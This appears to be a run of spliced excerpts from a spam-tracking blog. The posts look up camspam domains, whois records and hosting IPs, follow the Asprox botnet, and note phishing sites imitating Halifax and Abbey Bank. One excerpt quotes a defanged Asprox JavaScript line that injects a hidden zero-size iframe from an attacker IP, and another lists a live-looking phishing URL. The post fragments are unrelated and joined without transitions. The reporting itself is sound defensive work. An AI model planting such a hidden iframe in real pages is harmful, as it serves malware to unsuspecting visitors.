I don't know what a registrar does when suspending a domain.
But I take it for granted that registrars know that.
Directi should know, I guess.
I was floating on a wave of dirt and ended up at the IP address 220.164.144.202.
So I float away to Spamhaus to that IP and get a long list, some of which apparently are camspam domains.
I have written about a couple of those earlier, so I checked one of them, ccmaria. com.
Not listed in SBL71930 about 220.164.144.202.
So I checked the whois and a dig:
Domain Name: CCMARIA.COM
A few days ago I wrote that the JavaScript files on the Asprox botnet were now pointing to a static IP instead of infected PCs on the botnet. Or more correctly: the content of the webpage hosted by the infected PCs on the Asprox botnet is an iframe from 91.203.93.4, inserted via JavaScript like this:
document.write("<iframe src=h||p://91.203.93.4/ cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
I have followed this over the last days, only manually; I have neither the tools nor the knowledge to automate this.
I mentioned in my last post, "xml48.com - again a Abbey Bank phish and a malware installer .." that I also received another phishing spam that day, for Halifax.
I checked a bit around that one today. Either the spammer screwed up the link in the spam or the phishing page has been taken down.
The link was: http://ww4.halifax-secure.co.uk.lvozx90.com/mem_bin/formssecure.aspsource=halifaxcoukHOME1/
But I had a look at the hosting for ww4.halifax-secure.co.uk.lvozx90.com:
ww4.halifax-secure.co.uk.lvozx90.com. 180 IN A 75.75.182.238
Just in, this one.
Spamvertised domain is mycamchicks.com. With further links to camcrush.com and camgenie.com.
Whois info and "hosting" for mycamchicks.com is a bit interesting.
First the whois info:
Domain Name: MYCAMCHICKS.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: NS4.MYOOODNS.COM
Name Server: NS5.MYOOODNS.COM
Name Server: NS6.MYOOODNS.COM
Name Server: NS7.MYOOODNS.COM
Status: clientTransferProhibited
Updated Date: 05-may-2008
I activated a parked domain back in March, testing a new host and the import of the old WordPress database into Drupal for use on this site.
Catchall for email was also activated out of curiosity, but I forgot about it.
About a week ago I logged in to delete everything and set the status to parked again.
And discovered 300+ pieces of spam. That is not much, and it was mostly the usual stuff: pills and counterfeit goods of various sorts.